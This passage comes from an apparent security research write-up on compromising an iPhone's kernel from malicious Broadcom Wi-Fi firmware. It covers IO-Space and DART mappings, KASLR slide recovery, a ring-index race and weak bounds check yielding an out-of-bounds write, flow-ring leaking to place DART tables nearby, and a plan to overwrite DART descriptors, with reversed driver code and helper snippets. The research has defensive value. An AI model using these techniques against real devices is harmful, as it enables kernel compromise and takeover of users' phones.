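    auto io = io_to_phys.find(iova & ~0xFFFULL);  // DART: 4KB granule
    if (io == io_to_phys.end()) return out;
    uint64_t pa = io->second + (iova & 0xFFF);
    auto va = pa_to_va.find(pa & ~(page - 1));
    if (va == pa_to_va.end()) return out;
    for (uint64_t base : va->second) out.push_back(base + (pa & (page - 1)));
    return out;
}
```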

Consequently, we can now iterate over the entire IO-Space exposed to the Wi-Fi chip, extracting the contents of every mapped region:



After producing a copy of the entire contents of IO-Space, we can now comb through it, searching for any “accidental” mappings that might benefit a would-be attacker on the Wi-Fi chip.

For starters, recall that the kernel protects itself against remote attackers by using KASLR. This mitigation introduces a randomised “slide” value, which is added to the kernel’s base load address (both virtual and physical). Since many exploits rely on the ability to pre-calculate addresses within the kernel’s VAS, such a mitigation may slow down attackers, or hinder the reliability of exploits targeting the kernel.

However, as the same “slide” value is applied globally, a single “leaked” kernel VAS address often results in a KASLR bypass (allowing attackers to deduce the slide’s value). Therefore, if any kernel virtual address is accidentally leaked in an IO-Space mapped page, the Wi-Fi chip may similarly be able to subvert KASLR.
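The arithmetic behind such a bypass is a single subtraction. Given a leaked pointer and the unslid address of the same object (taken from the kernelcache on disk), the slide falls out directly. It can then rebase any other static address. The alignment check below is only an illustrative sanity filter, and the `slide_align` value in the usage is an assumption rather than a known iOS constant.

```cpp
#include <cassert>
#include <cstdint>
#include <optional>

// Recovers the global KASLR slide from one leaked pointer, rejecting
// candidates that are negative or not a multiple of `slide_align`.
std::optional<uint64_t> compute_slide(uint64_t leaked, uint64_t unslid,
                                      uint64_t slide_align) {
    if (leaked < unslid) return std::nullopt;
    uint64_t slide = leaked - unslid;
    if (slide % slide_align != 0) return std::nullopt;
    return slide;
}

// Applies the recovered slide to any other unslid kernel address.
uint64_t rebase(uint64_t unslid, uint64_t slide) { return unslid + slide; }
```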

Apart from the potential implications for KASLR, the presence of any kernel VAS pointer in IO-Space would be worrisome, as the pointer might be used by kernel code. Allowing a malicious Wi-Fi chip to corrupt its value may subsequently affect the kernel’s behaviour (perhaps even resulting in code execution).

To find out whether any kernel pointers are exposed through IO-Space, let’s scan through the extracted IO-Space pages, searching for 64-bit words corresponding to addresses within the kernel’s VAS. After going through every single page, we are greeted with a negative result: we find no kernel VAS pointers in any IO-Space mapped page!
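The scan itself is straightforward. The minimal sketch below assumes the dumped IO-Space pages are available as raw byte buffers, and that "looks like a kernel VAS pointer" means falling within a single assumed range. The bounds are illustrative placeholders, not the iPhone 7's actual layout.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>
#include <vector>

// Illustrative bounds for a plausible kernel VAS pointer (assumptions).
constexpr uint64_t kKernelMin = 0xFFFFFFF000000000ULL;
constexpr uint64_t kKernelMax = 0xFFFFFFFFFFFFF000ULL;

// Return the byte offsets of every aligned 64-bit word in 'page' whose value
// falls within the assumed kernel range. Words are read in host byte order,
// which is little-endian on the platforms discussed here.
std::vector<size_t> find_kernel_pointers(const std::vector<uint8_t>& page) {
    std::vector<size_t> hits;
    for (size_t off = 0; off + sizeof(uint64_t) <= page.size();
         off += sizeof(uint64_t)) {
        uint64_t word;
        std::memcpy(&word, page.data() + off, sizeof(word));  // no aliasing UB
        if (word >= kKernelMin && word < kKernelMax)
            hits.push_back(off);
    }
    return hits;
}
```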

With a cursory investigation of IO-Space out of the way, we can now dig deeper, attempting to gain a better understanding of the IO-mapped contents. To this end, we’ll combine several approaches:
  1. Inspect each page’s contents to look for hints regarding its role
  2. Locate the kernel code responsible for interacting with the same IO-Space range
  3. Check the IO-Space address against known addresses in the Wi-Fi firmware
  4. Use the Android driver as a reference for any “strange” unidentified constructs

After performing the above steps, we are finally able to piece together a complete mapping of IO-Space (thus also confirming that no “accidental” mappings are present). It is important to note that since IO-Space is not subject to randomisation, the IO addresses are constant, and are not affected by the KASLR slide.

Searching For Vulnerabilities


Having explored the aspects relating to DART, IO-Space mappings, and low-level components, let’s proceed to inspect the more traditional attack surfaces exposed by the host.

Recall that the Wi-Fi chip and the host communicate with one another through a series of “rings”, mapped into IO-Space. Each ring facilitates the transfer of data in a single direction: either from the device to the host (D2H), or vice versa (H2D).

Among the messages transferred through message rings, “Control Messages” represent a rather abundant attack surface. These messages are used to instruct the firmware to perform complex state-changing operations, such as creating additional message rings, deleting them, and even transporting high-level requests (ioctls) to be processed by the firmware.

Due to their complexity, control messages rely on a bidirectional communication channel: the “Control Submit” ring (H2D) allows the host to submit requests to the device, while the “Control Complete” ring (D2H) is used by the device to return the results to the host.

After committing messages to the D2H rings, the Wi-Fi firmware signals the host by writing to a “MailBox” register and triggering an MSI interrupt. This interrupt is subsequently handled by the host, which inspects the MailBox register and notifies the corresponding (D2H) rings that data may be available for processing.



Tracing through the above flow, we reach the handler function for processing incoming control messages within the host. To aid in reverse-engineering these messages, we’ll utilise Broadcom’s Android driver (bcmdhd), which contains the definitions for the control structures, as well as the message codes corresponding to each request.

AppleBCMWLANBusPCIeInterface::drainControlCompleteRing

The encapsulating handler simply reads the “message type” field and delegates the message’s processing to a dedicated handler -- one per message type. Going over each of the handlers, we stumble across a memory corruption bug triggerable by the firmware. Incidentally, the bug was present in a handler for a message type which isn’t available in the Android driver.

Moving on, let’s set our sights on slightly higher targets in the protocol stack. Recall that control rings are also used to carry high-level control requests from the host to the firmware, dubbed “ioctls”. Each ioctl allows the host to either set a firmware-specific configuration value, or retrieve its current value. As this channel is quite versatile, much of the high-level interaction between the host and the firmware is enacted through it, including retrieving the current channel, setting network configurations, and more.

However, like any other signal originating from the device, “ioctls” can be co-opted by malicious Wi-Fi firmware. After all, an attacker controlling the Wi-Fi firmware can simply hook the “ioctl” handling function, thereby gaining full control over the contents transmitted back to the host.

Reverse-engineering the high-level driver, AppleBCMWLANCore, we quickly identify the entry point responsible for issuing ioctl requests from the host to the Wi-Fi firmware. Cross-referencing the function, we find nearly 500 call sites, several of which act as wrappers for common functionality, thus revealing even more originating call sites. After going over each of these sites, we find several memory corruptions in their corresponding handlers.

Lastly, there’s one more communication channel to consider -- Broadcom allows the in-band transmission of “event packets” from the Wi-Fi firmware to the host. These frames, denoted by a unique EtherType (0x886C), carry unsolicited events from the firmware and require special handling by the host. Tracing through the host’s RX path brings us to the entry point for handling such frames:


AppleBCMWLANCore::handleEventPacket
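Telling these frames apart from ordinary traffic only requires the EtherType field of the Ethernet header. The minimal classifier below assumes a standard 14-byte Ethernet II header (destination MAC, source MAC, big-endian EtherType). The function name is hypothetical and is not the kernel's.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

constexpr uint16_t kBrcmEventEtherType = 0x886C;  // Broadcom event frames
constexpr size_t kEthHeaderLen = 14;  // dst MAC (6) + src MAC (6) + EtherType (2)

// True when the frame's EtherType marks it as a firmware event packet.
// The EtherType is stored big-endian at offset 12 of the Ethernet header.
bool is_firmware_event(const uint8_t* frame, size_t len) {
    if (len < kEthHeaderLen)
        return false;  // too short to carry an Ethernet header
    uint16_t ether_type = static_cast<uint16_t>((frame[12] << 8) | frame[13]);
    return ether_type == kBrcmEventEtherType;
}
```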

Once again, going over each handler in the above function (while using the Android driver to aid our understanding of the corresponding event codes and data structures), we find two more vulnerabilities.

Better Vulnerabilities

Data Races?


While the vulnerabilities we just discovered allow us to trigger several forms of memory corruption in the host (OOB writes, heap overflows), and even to leak constrained information from the host to the firmware, reliably exploiting any of them remains rather challenging.

For starters, the Wi-Fi chip has no visibility into the host’s memory (apart from the IO-Space mapped regions), and relatively little control over objects allocated within the kernel. Therefore, preparing the kernel’s memory in order to successfully launch a heap memory corruption attack would require significant effort. What’s more, this challenge is compounded by the presence of KASLR, which prevents us from accurately locating the kernel’s data structures (barring any information disclosure).

Nonetheless, perhaps we can identify better primitives by digging deeper!

So far, we’ve only considered the contents of the data transferred between the host and the firmware. Effectively, we were thinking of the firmware and the host as two distinct entities, communicating with one another through an isolated communication channel. In fact, nothing could be further from the truth -- the two endpoints share a PCIe interface, allowing the firmware to perform DMA accesses at will to any IO-Space address.

One of the major risks when using a shared memory interface is timing. While the host and firmware normally synchronise their operations to ensure that no data races occur, attackers controlling the Wi-Fi firmware are bound by no such agreement. Using our control over the Wi-Fi chip, we can intentionally modify data structures within IO-Space as they are being accessed by the host. Doing so might allow us to introduce race conditions, such as TOCTTOUs, creating vulnerable conditions in code that is otherwise safe (under normal assumptions).

The first targets for such modification are the control messages we inspected earlier on. Inspecting the control ring handler in the host, it appears that the messages are read directly from the IO-Space mapped buffer, raising the possibility of data races in their processing. Nonetheless, going over the relevant code paths, we find no security-relevant races.

What about the second channel we reviewed -- event packets? Perhaps we could modify a packet’s contents while it is being processed, thereby affecting the kernel’s behaviour? Once again, the answer is negative: each transferred packet is first copied from its IO-Space mapped buffer to a kernel-resident mbuf before being passed on for processing, thus eliminating the possibility of firmware-induced races.

Message Rings, Revisited


So far, we’ve inspected the high-level functionality provided by message rings, namely, the control messages transported therein. However, we’ve neglected several aspects of their operation. One implementation detail of particular note is the method through which rings allow the endpoints to synchronise their accesses to the ring.

To allow concurrent accesses by both the ring’s consumer and its corresponding producer, each ring is assigned a pair of indices: a read index specifying the location up to which the consumer has read the messages, and a write index specifying the location at which the next message will be submitted by the producer. As the name implies, each ring forms a circular buffer -- upon arriving at the last ring index, the indices simply wrap around, returning to the ring’s base.
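The index scheme can be illustrated with a small single-producer, single-consumer ring. This is a generic sketch of the technique, not Apple's or Broadcom's implementation. The class name and the keep-one-slot-empty convention are assumptions. The producer only advances the write index, the consumer only advances the read index, and both wrap to zero at the end of the ring.

```cpp
#include <cassert>
#include <cstdint>
#include <optional>
#include <vector>

// Generic circular buffer driven by a read index (consumer) and a write
// index (producer). One slot stays empty so read == write means "empty".
class Ring {
public:
    explicit Ring(uint32_t capacity) : items_(capacity) {}

    bool push(uint64_t item) {  // producer side
        uint32_t next = static_cast<uint32_t>((write_ + 1) % items_.size());
        if (next == read_)
            return false;       // ring full
        items_[write_] = item;
        write_ = next;          // publish the new write index (wraps to 0)
        return true;
    }

    std::optional<uint64_t> pop() {  // consumer side
        if (read_ == write_)
            return std::nullopt;     // ring empty
        uint64_t item = items_[read_];
        read_ = static_cast<uint32_t>((read_ + 1) % items_.size());
        return item;
    }

    uint32_t read_index() const { return read_; }
    uint32_t write_index() const { return write_; }

private:
    std::vector<uint64_t> items_;
    uint32_t read_ = 0;
    uint32_t write_ = 0;
};
```

In the Apple driver, both indices live in IO-Space rather than in private members. As the following paragraphs explain, that choice is what hands the device write access to them.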


Since both endpoints must be aware of the ring indices to coordinate their access, there must be a mechanism through which the indices are shared between the two. In Apple’s case, this is achieved by placing all the indices in IO-Space mapped buffers.


While mapping the indices into IO-Space is a convenient way to share their values, it is not risk-free. For starters, if all the above indices are mapped into IO-Space, a malicious Wi-Fi chip may not only use DMA to read them, but may also be able to modify them.

This form of access is excessive -- after all, the device need only update the read indices for H2D rings, and the write indices for D2H rings. The remaining indices should, at most, be read by the device. However, as DART’s implementation is proprietary, it is unknown whether it supports read-only mappings. Consequently, all of the above indices are mapped into IO-Space as both readable and writable, allowing a malicious Wi-Fi chip to freely alter their values.

This IO-Space-based index sharing mechanism raises an important question: what if a Wi-Fi chip were to maliciously modify a ring’s indices while the ring is being processed by the host? Would doing so introduce a race condition? To find out, let’s take a look at the function through which the host submits messages into H2D rings:

1.  void* AppleBCMWLANPCIeSubmissionRing::workloopSubmitTx(uint32_t* p_read_index,
2.                                                         uint32_t* p_write_index) {
3.
4.      //Getting the write index from the IO-Space mapped buffer (!)
5.      uint32_t write_index = *(this->write_index_ptr);
6.
7.      //Iterating until there are no more events to process
8.      while (this->getRemainingEvents(p_read_index, p_write_index)) {
9.
10.         //Calculate the next insertion address based on the write index
11.         void* ring_addr = (uint8_t*)this->ring_base + this->item_size * write_index;
12.         uint32_t max_events = this->calculateRemainingWriteSpace();
13.
14.         //Writing the current events to the ring
15.         uint32_t num_written = this->submit_func(..., ring_addr, max_events);
16.         if (!num_written)
17.             break; //No more events to process
18.
19.         //Update the write index
20.         write_index += num_written;
21.         if (write_index >= this->max_index)
22.             write_index = 0; //Wrap around
23.
24.         //Commit the new index to the IO-Space mapped buffer (!)
25.         *(this->write_index_ptr) = write_index;
26.     }
27.     ...
28. }
29.
30. class AppleBCMWLANPCIeSubmissionRing {
31.     ...
32.     uint32_t  max_index;          //The maximal ring index               (off 88)
33.     uint32_t  item_size;          //The size of each item                (off 92)
34.     uint32_t* read_index_ptr;     //IO-Space mapped read index pointer   (off 174)
35.     uint32_t* write_index_ptr;    //IO-Space mapped write index pointer  (off 184)
36.     void*     ring_base;          //IO-Space mapped ring base address    (off 248)
37. };
function 0xFFFFFFF006D36D04

Alright! Looking at the above function immediately raises some red flags…

The function appears to read values from IO-Space mapped buffers in several different locations, seemingly making no effort to keep the values it reads consistent. This kind of pattern opens the door to race conditions induced by the firmware.

Let’s focus on the “write index” utilised by the function. First, the index is fetched by reading its value directly from the IO-Space mapped buffer (line 5). This same value is then used to derive the location to which the next ring item will be written (line 11). Crucially, however, the value is not used in any way by the surrounding verifications that the function relies on to determine whether the current ring indices are valid (lines 8, 12).

Therefore, the verification methods must re-fetch the indices’ values, introducing a possible discrepancy between the value used during verification and the one used to place the next item.

To exploit the above issue, an attacker controlling the Wi-Fi chip can DMA into the ring indices in order to introduce one value for the ring address calculation (line 5), while quickly switching the index to a different, valid value for the remaining validations (lines 8, 12). If the race is won, the next H2D item will be submitted by the host at an arbitrary attacker-controlled offset from the ring’s base, triggering an out-of-bounds write!
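This is a classic double fetch. The self-contained simulation below uses hypothetical names throughout. It models the IO-Space index as a value the "device" can change between two host reads. The vulnerable variant derives the offset from one read (as on line 5) and validates another (as on lines 8 and 12). The hardened variant snapshots the index once, then validates and uses that local copy.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Simulated IO-Space-mapped index: successive host reads observe successive
// values from 'sequence', modelling a device rewriting it via DMA in between.
struct SharedIndex {
    std::vector<uint32_t> sequence;
    size_t reads = 0;
    uint32_t read() {
        size_t i = reads < sequence.size() ? reads : sequence.size() - 1;
        ++reads;
        return sequence[i];
    }
};

// Vulnerable: the offset comes from fetch #1, the check from fetch #2.
// Returns the byte offset the host would write to, or -1 if rejected.
int64_t offset_double_fetch(SharedIndex& idx, uint32_t max_index,
                            uint32_t item_size) {
    uint32_t used = idx.read();     // fetch #1: used for the address
    uint32_t checked = idx.read();  // fetch #2: used for validation
    if (checked >= max_index)
        return -1;
    return static_cast<int64_t>(used) * item_size;
}

// Hardened: fetch once, then validate and use the same local snapshot.
int64_t offset_single_fetch(SharedIndex& idx, uint32_t max_index,
                            uint32_t item_size) {
    uint32_t snapshot = idx.read();
    if (snapshot >= max_index)
        return -1;
    return static_cast<int64_t>(snapshot) * item_size;
}
```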

Removing The Race Condition


While the above primitive is no doubt useful, it has one inherent downside -- winning a data race from an external vantage point may be a difficult feat, especially considering that the platform we’re executing on (an ARM Cortex R) is significantly slower than the targeted one (a full-blown application processor).

Perhaps by gaining a better understanding of the primitive, we can deal with these limitations. To this end, let’s take a closer look at the validation performed by the submission function:

1.  uint32_t AppleBCMWLANPCIeSubmissionRing::calculateRemainingWriteSpace() {
2.
3.      uint32_t read_index, write_index;
4.      this->getIndices(&read_index, &write_index);
5.
6.      //Did the ring wrap around?
7.      if (read_index > write_index)
8.          return read_index - (write_index + 1);
9.      else
10.         return this->max_index - write_index + (read_index ? 0 : -1);
11. }
12.
13. void AppleBCMWLANPCIeSubmissionRing::getIndices(uint32_t* rindex,
14.                                                 uint32_t* windex) {
15.     uint32_t read_index = *(this->read_index_ptr);
16.     uint32_t write_index = *(this->write_index_ptr);
17.     if (read_index >= 0x10000 || write_index >= 0x10000)
18.         panic(...);
19.     *rindex = read_index;
20.     *windex = write_index;
21. }

Ah-ha! Looking at the code above, we can identify yet another flaw.

When fetching the ring indices, the getIndices function attempts to validate their values to ensure that they do not exceed the allowed ranges. This is undoubtedly a good idea, as it prevents corrupted values from being used (which might result in memory corruption).

However, instead of comparing the indices against the current ring’s capacity, the function compares them against a fixed maximal value: 0x10000. While this value is certainly an upper bound on the rings’ capacities, it is far from a tight bound (in fact, most rings hold only several hundred items at most).

Therefore, observing the code above, we reach two immediate conclusions. First, if we were to attempt a race condition whereby the ring index is modified to a value larger than the fixed bound (0x10000), we run the risk of triggering a kernel panic should the race attempt fail (line 18). More importantly, however, modifying the write index to any value below the fixed bound (but still beyond the actual ring’s bounds) will allow us to pass the validations above, resulting in an out-of-bounds write with no race condition required.
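To make the flaw concrete, the sketch below puts the fixed-bound check from getIndices next to a check against the ring's actual capacity. It also transcribes the arithmetic of calculateRemainingWriteSpace from the listing above, and computes where the next item would land (line 11 of workloopSubmitTx). Helper names are hypothetical. The capacity and item size are plain parameters, not values taken from the driver.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint32_t kFixedBound = 0x10000;  // the constant used by getIndices

// Mirrors getIndices: only indices >= 0x10000 are rejected (via panic).
bool passes_fixed_bound(uint32_t index) { return index < kFixedBound; }

// A tight check would compare against the ring's own capacity instead.
bool passes_capacity_check(uint32_t index, uint32_t max_index) {
    return index < max_index;
}

// Same unsigned 32-bit arithmetic as calculateRemainingWriteSpace. With a
// write index past the end of the ring, the subtraction wraps around, so a
// large amount of free space is reported instead of a full ring.
uint32_t remaining_write_space(uint32_t read_index, uint32_t write_index,
                               uint32_t max_index) {
    if (read_index > write_index)
        return read_index - (write_index + 1);
    return max_index - write_index - (read_index ? 0u : 1u);
}

// Byte offset from ring_base at which the next item is written.
uint64_t item_offset(uint32_t write_index, uint32_t item_size) {
    return static_cast<uint64_t>(item_size) * write_index;
}

// Largest offset reachable while still passing the fixed-bound check.
uint64_t max_reachable_offset(uint32_t item_size) {
    return item_offset(kFixedBound - 1, item_size);
}
```

For example, with a hypothetical 256-entry ring of 48-byte items, a write index of 0x1000 passes getIndices, is reported as having ample free space, and places the next item 0x30000 bytes past the ring's base.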

Using the above primitive, we can target any H2D ring, causing the next element to be reliably inserted at an out-of-bounds address within the kernel’s VAS! While the affected range is limited to the ring’s item size multiplied by the fixed bound, as we’ll see later on, that’s more than enough.

Triggering the Primitive


Before pressing on, we must verify that the scenario above is indeed feasible. After all, many components within the kernel might use the modified ring indices, and they, in turn, may enforce their own validations.

To do so, we’ll perform a short experiment using our research platform. First, we’ll choose an H2D ring and fetch its corresponding object within the kernel. Using this object, we can then locate the ring’s base address, allowing us to inspect its contents. Next, we’ll modify the ring indices using the firmware’s DMA engine, while concurrently monitoring the kernel virtual address at the targeted offset for modification. If the primitive is triggered successfully, we should expect an item to be inserted at the target offset from the ring’s base address.

However, running the above experiment results in a resounding failure! Every attempt to trigger the out-of-bounds write results in a kernel panic, crashing the device. Inspecting the panic logs reveals the source of this crash:


It appears that when executing our attack, the firmware attempts to perform a DMA read from an address beyond its IO-Space mapped ranges! On reflection, the source of the error is immediately apparent: since both the firmware and the host share the ring indices through IO-Space, modifying them affects not only the host, but also the firmware’s implementation of the MSGBUF protocol.

Namely, the firmware attempts to read the ring’s contents using the corrupted indices, resulting in an out-of-bounds access to IO-Space, which triggers the above panic.

As we control the firmware, we could simply try to intercept the corresponding code paths in its MSGBUF implementation, preventing it from issuing the malformed DMA request. Unfortunately, this approach is easier said than done -- the firmware’s implementation of MSGBUF is woven into many code paths in both the ROM and RAM, and attempting to patch out each function results in either breakage of a different component or undesired side-effects.

Instead of addressing the sources of the DMA transfers, we’ll go straight to the target -- the engine itself. Recall that each DMA engine on the firmware is accessible through an instance of a single structure (dma_info). If we change the DMA engine’s backplane register pointers within the dma_info structure, the calling code paths can continue issuing malformed DMA requests, but the requests themselves never actually reach the DMA engine, so no fault is triggered.
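The idea can be sketched with hypothetical types. The real dma_info layout is not shown in this post, so the `dma_regs`/`dma_info` definitions and field names below are illustrative only. Pointing the engine's register pointer at a scratch copy means later register writes (such as the one that would start a transfer) land in ordinary memory instead of reaching the engine.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical register block of a DMA engine (illustrative layout only).
struct dma_regs {
    volatile uint32_t control;
    volatile uint32_t addr_low;
    volatile uint32_t addr_high;
    volatile uint32_t kick;  // in this model, writing here starts a transfer
};

// Hypothetical stand-in for the firmware's per-engine dma_info structure.
struct dma_info {
    dma_regs* regs;  // backplane register pointer used by all callers
};

// Callers keep issuing requests through di->regs, unaware of any redirection.
void issue_transfer(dma_info* di, uint64_t io_addr) {
    di->regs->addr_low = static_cast<uint32_t>(io_addr);
    di->regs->addr_high = static_cast<uint32_t>(io_addr >> 32);
    di->regs->kick = 1;
}

// Redirect the engine's registers to a scratch block. Returns the original
// pointer so the redirection can be undone later.
dma_regs* redirect_engine(dma_info* di, dma_regs* scratch) {
    dma_regs* original = di->regs;
    di->regs = scratch;
    return original;
}
```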


Indeed, after incorporating the above patch into our vulnerability trigger, we can freely modify the ring indices without inducing a crash. Furthermore, inspecting the corresponding kernel virtual address at the targeted index, we can see that our overwrite is finally successful!

Devising An Exploit Plan


Having concluded that the primitive is usable, we can now proceed to the next phase -- devising an exploit plan. Namely, we must choose a data structure to target with the primitive, one which may allow us to either modify the kernel’s behaviour, or otherwise gain a useful primitive bringing us closer to that goal.

So which data structure should we target? As we have no visibility into the kernel’s address space, reliably locating structures within the kernel presents quite a challenge. What’s more, our primitive only allows limited control over the written content (namely, the data written by the host is an H2D ring item). On top of that, each OOB element can only be written at offsets which are multiples of the ring’s item size, introducing alignment constraints.

The above limitations make reliable exploitation rather difficult. Alas, if only there were a data structure whose internal composition were relatively flexible, and for which a single modification would grant us complete control over the host…

...But of course, we’ve already come across the perfect target -- DART’s translation tables!

Recall that DART’s translation tables govern the mapping between IO-Space and the host’s physical address space. If we were able to use our primitive to modify the tables, we might be able to introduce new mappings into IO-Space, pointing at arbitrary physical ranges within the host’s PAS. Mapping arbitrary physical memory into the Wi-Fi chip is a nearly ideal primitive, as it would allow the chip to modify any data structure used by the kernel, leading to trivial code execution.

In order to carry out such an attack, we must first determine whether DART’s translation tables are indeed valid targets for the vulnerability primitive. Namely, we must find out whether they reside within the primitive’s sphere of influence.

However, scanning through the memory ranges within the primitive’s scope, we quickly realise that the placement of objects adjacent to the message rings is highly variable. Indeed, each device reboot yields an entirely different layout, preventing us from relying on any particular object being placed at any given offset from a message ring.

Perhaps we’re out of luck…?

Shaping IO-Space


...Instead of relying on lucky placement of nearby objects, let’s take matters into our own hands.

To place a DART translation table within the primitive’s scope, we’d need to either move a translation table into the primitive’s scope, or move one of the message rings, thus shifting the primitive’s scope across different regions of the kernel’s memory.

The former approach seems infeasible: DART’s translation tables are only allocated when the IO-Space mappings are first populated (namely, when the Wi-Fi chip is first initialised). Once the mapping is complete, all of DART’s translation tables remain in fixed positions within the kernel’s VAS.

But what about moving the rings? While control rings are immovable, a second set of rings exists -- “flow rings”. Flow rings are H2D rings used to facilitate the transfer of outgoing (TX) traffic. They do not carry the traffic itself, but rather notify the device of the transmitted frame’s metadata (including the IO-Space address at which its actual content is stored).

Unlike control rings, flow rings are far more “flexible”. Individual flows are dynamically added and removed as the need arises, by sending a corresponding control message from the host to the device. Each flow is identified by its endpoints (source and destination MAC), the protocol it carries (i.e., EtherType), and its “priority”.
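A flow's identity can be modelled as a small key built from the four attributes listed above. The sketch below uses hypothetical type and field names. The driver's own bookkeeping is not shown in this post, and the sequential ID allocation starting at a caller-supplied first ID is an assumption.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <map>
#include <tuple>

using Mac = std::array<uint8_t, 6>;

// Hypothetical flow key: (source MAC, destination MAC, EtherType, priority).
struct FlowKey {
    Mac src;
    Mac dst;
    uint16_t ether_type;
    uint8_t priority;
    bool operator<(const FlowKey& o) const {
        return std::tie(src, dst, ether_type, priority) <
               std::tie(o.src, o.dst, o.ether_type, o.priority);
    }
};

// Hypothetical flow table: reuse the ring of an existing flow, or allocate
// a new ring ID for a previously unseen combination.
class FlowTable {
public:
    explicit FlowTable(uint16_t first_id) : next_id_(first_id) {}
    uint16_t lookup_or_create(const FlowKey& key) {
        auto it = rings_.find(key);
        if (it != rings_.end())
            return it->second;
        uint16_t id = next_id_++;
        rings_.emplace(key, id);
        return id;
    }
    void remove(const FlowKey& key) { rings_.erase(key); }
    size_t size() const { return rings_.size(); }

private:
    std::map<FlowKey, uint16_t> rings_;
    uint16_t next_id_;
};
```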

Perhaps we can use the dynamic nature of flow rings to our advantage. For example, if we were to delete a flow ring, it might subsequently be re-allocated at a different location in the kernel’s memory, shifting the scope of our OOB primitive to a perhaps more “interesting” region of objects.

Normally, deleting a flow ring is a two-way process: the host sends a deletion request, which is subsequently answered by a corresponding message from the device signalling a successful deletion. However, inspecting the host’s implementation of these messages, it appears we can just as well skip the first half of the exchange, and send an unsolicited deletion response from the device:

1.  uint32_t AppleBCMWLANBusPCIeInterface::completeFlowRingDeleteResponseMsg(
2.                uint64_t unused, struct tx_flowring_delete_response_t* msg) {
3.   
4.      //Is the ring ID within bounds?
5.      if (msg->flow_ring_id < this->min_flow ||
6.          msg->flow_ring_id >= this->max_flow) {
7.          ...
8.      }
9.      //Does a flow ring exist at the given index?
10.     else if (this->flow_rings[msg->flow_ring_id]) {
11.         this->deleteFlowCallback(msg->status, msg->flow_ring_id);
12.         ...
13.         return 0;
14.     }
15.     else {
16.         ...
17.         return 0xE00002BC;
18.     }
19. }
function 0xFFFFFFF006D2FD44

Doing so causes an interesting side-effect: instead of completely deleting the ring, the host decrements a single reference count on the ring object, which is insufficient to bring the total count down to zero (the missing release was meant to be performed by the code responsible for sending the deletion request in the first place).

Consequently, the flow ring is left mapped into IO-Space, but is unusable by the host. As such, newly allocated flow rings cannot occupy the same IO-Space range (as it remains occupied by the unusable ring), and must instead be carved from higher IO-Space addresses.
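The effect of the unsolicited response can be modelled with a plain reference count. This toy model uses hypothetical names. Following the description above, it assumes the request path and the response path each drop one reference. An unsolicited response therefore runs only half of the teardown, and the ring (with its IO-Space range) is never released.

```cpp
#include <cassert>

// Toy model of a flow ring's lifetime (hypothetical; not the driver's code).
struct FlowRingModel {
    int refcount = 2;    // assumed: one reference per half of the exchange
    bool freed = false;  // true once the IO-Space range would be released
    void release() {
        if (--refcount == 0)
            freed = true;
    }
};

// Normal deletion: the request path and the response path each release.
void delete_normally(FlowRingModel& r) {
    r.release();  // host sends the deletion request
    r.release();  // device's deletion response is processed
}

// Unsolicited response from the device: only the response path runs.
void unsolicited_response(FlowRingModel& r) {
    r.release();
}
```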

This primitive has several interesting side-effects.

For starters, it allows us to re-allocate flow rings, moving their base addresses around within the kernel’s VAS and recasting the net over potentially interesting objects within the kernel.

More importantly, however, this primitive allows us to force the allocation of a brand new DART L2 translation table. Since each L2 translation table can only map a fixed range of IO-Space, by continuously leaking flow rings we can exhaust the available space in the L2 table, forcing DART to allocate a new table from which the next IO-Space addresses are carved.
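How many leaked rings this takes depends on how much IO-Space one L2 table covers. DART's layout is not documented, so the sketch below is fully parameterised. It assumes an L2 table holds `entries` 64-bit descriptors, each mapping one page of `page_size` bytes, and that rings of `ring_bytes` bytes are carved from IO-Space in whole pages and never straddle two tables. None of these values come from the post.

```cpp
#include <cassert>
#include <cstdint>

// IO-Space span covered by a single L2 table (entries * page size).
uint64_t l2_span(uint64_t entries, uint64_t page_size) {
    return entries * page_size;
}

// Descriptors (pages) consumed by one ring, rounded up to whole pages.
uint64_t pages_per_ring(uint64_t ring_bytes, uint64_t page_size) {
    return (ring_bytes + page_size - 1) / page_size;
}

// Rings that still fit in the current L2 table, given 'used_entries'
// descriptors already in use. Once that many rings have been leaked, the
// next ring no longer fits, so DART must allocate a fresh L2 table.
uint64_t rings_to_exhaust(uint64_t entries, uint64_t used_entries,
                          uint64_t ring_bytes, uint64_t page_size) {
    uint64_t free_entries = entries - used_entries;
    return free_entries / pages_per_ring(ring_bytes, page_size);
}
```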

Lastly, as luck would have it, both the rings themselves and DART’s translation tables are allocated using the same allocator (IOMalloc) and have similar sizes, so they are carved from the same “zone” of memory. Therefore, by continuously leaking IO-Space addresses and creating new flow rings until a new DART L2 translation table is formed, we can guarantee that the new table will be placed in close proximity to the next flow ring, placing the L2 translation table within our primitive’s scope!


Putting it all together, we can finally achieve a reliable placement of DART translation tables in close proximity to a flow ring, allowing us to overwrite entries in the translation tables with flow ring items.

Flow Ring Items vs. DART Descriptors


To understand whether flow ring items are good candidates for overwriting DART descriptors, let’s take a moment to inspect their structure. As these items appear in the same form in the Android driver, we are spared the need to reverse-engineer them:

So how does the above structure relate to a DART descriptor?

As the above structure has a 64-bit aligned size, and ring items are always placed in increments of that size, we can deduce that each quadword in the structure will reside at a 64-bit aligned address (given that the ring’s base is itself 64-bit aligned). Similarly, DART descriptors are 64 bits wide and are placed at 64-bit aligned addresses. Therefore, each aligned quadword in the above structure is a potential candidate for replacing a DART descriptor.
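The alignment argument can be turned into a small calculation. Given the ring's base address, its item size and the address of a target DART descriptor, which OOB write index (and which quadword of that item) lands on the target? The sketch assumes, as above, that the base, the item size and the target are all 8-byte aligned. It also rejects indices that getIndices would panic on. The names are hypothetical.

```cpp
#include <cassert>
#include <cstdint>
#include <optional>

struct Overlap {
    uint32_t write_index;  // ring index whose item covers the target
    uint32_t quadword;     // which 64-bit word of that item hits the target
};

// With 8-byte aligned inputs, each quadword of each item lines up exactly
// with one 64-bit descriptor slot.
std::optional<Overlap> overlap_for(uint64_t ring_base, uint32_t item_size,
                                   uint64_t target) {
    if (target < ring_base || ring_base % 8 != 0 || item_size % 8 != 0 ||
        target % 8 != 0)
        return std::nullopt;
    uint64_t delta = target - ring_base;
    uint64_t index = delta / item_size;
    if (index >= 0x10000)  // getIndices would panic on such an index
        return std::nullopt;
    return Overlap{static_cast<uint32_t>(index),
                   static_cast<uint32_t>((delta % item_size) / 8)};
}
```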

